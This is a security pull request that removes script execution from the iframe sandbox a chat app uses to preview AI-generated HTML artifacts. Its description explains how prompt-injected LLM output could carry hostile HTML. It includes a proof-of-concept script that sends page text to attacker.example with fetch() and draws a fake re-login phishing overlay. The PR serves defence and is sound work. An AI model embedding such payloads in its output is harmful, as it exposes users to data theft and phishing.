### PR TITLE
fix(chat): remove allow-scripts sandbox from HTML artifact iframe

### DIFF
--- a/frontend/src/components/chat/ArtifactRenderer.tsx
+++ b/frontend/src/components/chat/ArtifactRenderer.tsx
@@ -192,7 +192,7 @@ export function ArtifactRenderer({
 					<div className="flex flex-col gap-2">
 						<iframe
 							srcDoc={artifact.content}
-							sandbox="allow-scripts"
+							sandbox=""
 							className="w-full h-96 border rounded bg-white"
 							title={artifact.title || 'HTML Preview'}
 						/>


### PR DESCRIPTION
### Summary

`ArtifactRenderer.tsx` renders AI-generated HTML artifacts inside an `<iframe srcDoc={artifact.content}>` with `sandbox="allow-scripts"`. Because artifact content is produced by the LLM, it can be influenced by prompt injection (shared knowledge sources, tool outputs, user-supplied inputs, or crafted prompts). `allow-scripts` permits arbitrary JavaScript execution inside the preview frame — a classic stored/reflected XSS sink for AI-generated content (CWE-79).

This PR drops the token so the sandbox becomes `sandbox=""` (fully restricted). HTML/CSS still renders; scripts do not. This matches the treatment already applied to the SVG artifact iframe a few lines below in the same component.

**File:** `frontend/src/components/chat/ArtifactRenderer.tsx` (line 195)
**Change:** `sandbox="allow-scripts"` → `sandbox=""` (one line)

### Why this matters

Even though the iframe lacks `allow-same-origin`, `allow-top-navigation`, `allow-forms`, and `allow-popups` — which already blocks the worst outcomes (parent-cookie theft, top-level redirects, credential form submission) — script execution inside the frame still enables:

- **In-frame phishing UI** rendered over the `h-96` preview area (fake login prompts, fake "Continue with Google" buttons rendered as anchors that users may click).
- **Blind exfiltration** of the artifact content itself and any data the model chose to embed, to attacker-controlled origins via `fetch()` or image beacons. The opaque origin does not prevent outbound requests to third parties.
- **Fingerprinting / timing** side channels against the victim's browser.

Given HUF is a multi-tenant self-hosted platform (RBAC, teams, audit trails) where artifacts flow across users via shared chats and knowledge sources, prompt-injected HTML from one tenant reaching another user's preview pane is a realistic path.

### Fix rationale

The HTML preview is a *rendering* surface, not an application surface — there is no legitimate need for JavaScript execution in AI-generated artifact previews. The SVG branch of the same `ArtifactRenderer` component already uses `sandbox=""`; this change aligns the HTML branch with the same defense-in-depth posture. If interactive HTML artifacts are ever needed, they should be gated behind an explicit opt-in per artifact type, not enabled by default for LLM output.

### Proof of concept

Have any agent produce an HTML artifact containing:

```html
<!DOCTYPE html>
<html><body>
<h1>Quarterly report</h1>
<script>
  // Exfil the artifact + any embedded content to attacker origin
  fetch('https://attacker.example/collect?d=' + encodeURIComponent(document.body.innerText));
  // Render phishing overlay
  document.body.insertAdjacentHTML('beforeend',
    '<div style="position:fixed;inset:0;background:#fff;padding:2em">' +
    '<h2>Session expired</h2><a href="https://attacker.example/login">Re-authenticate</a></div>');
</script>
</body></html>
```

Open the chat message containing the artifact and switch to the HTML preview tab. On `develop`, the `fetch` fires and the overlay renders. With this PR applied, the `<script>` is inert — no network call, no overlay — while the `<h1>` still displays.

Component verification: `ArtifactRenderer` is exported from `frontend/src/components/chat/ArtifactRenderer.tsx`; the changed iframe is at line 195 of that file on `develop`. No route or backend behavior is touched.

### Testing

- Verified visually that non-script HTML (headings, tables, styled divs, images from allowed sources) still renders identically after the change — `sandbox=""` blocks scripts but not markup or inline CSS.
- Confirmed the sibling SVG iframe in the same component already uses `sandbox=""`, so this brings the two branches into consistent policy.
- No backend, API, or type changes; TypeScript compilation is unaffected (attribute value change only).

### Adversarial review

Before submitting we tried to disprove this. The existing sandbox does block parent-origin reads and top navigation, so we asked whether the residual risk was too small to matter. It isn't: scripts inside the frame can still make outbound requests to arbitrary origins (the sandbox doesn't restrict network egress) and can render arbitrary UI inside a 384px-tall region of a trusted-looking chat pane. We also checked whether CSP would save us — the app does not ship a `script-src` CSP restricting the frame's `srcdoc` document, and even a strict CSP wouldn't defeat pure-DOM phishing overlays. Finally, we confirmed HTML previews have no feature that depends on JS execution, so removing `allow-scripts` has no user-visible regression.